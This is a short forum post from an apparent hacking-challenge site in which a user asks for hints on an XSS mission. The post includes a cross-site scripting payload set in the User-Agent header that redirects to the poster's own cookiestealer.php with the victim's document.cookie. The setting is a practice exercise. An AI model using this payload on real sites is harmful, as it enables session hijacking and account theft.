Questions and Answers

How do I collect points?

  • +5
    Chosen as best answer
  • +1
    Posted answer
  • +1
    Posted question
  • +1
    Thumb up
  • -1
    Thumb down
1

by redanon13 in Challenge Help about July 26 open - report

Basic 41 (XSS 2)

Hello everyone!

I've tried to solve this mission by creating a cookie stealer and manipulating the user agent. I tried out the cookie stealer and it seems to work. This is whalt I put into the user agent: 

<script><!-- document.location="http://<my domain>/cookiestealer.php?stealcookie="+document.cookie; --></script>

I first tried it with the Brave browser (based on Chrome) and Firefox on my laptop, but my firewall seems to block the XSS. Then I tried it with the Dolphing browser on my phone, but it only displays what I've put into the user agent.

Am I on the wrong track? Can anyone give me a hint please?

Regards

No answers yet. Be the first!
You must login to post an answer.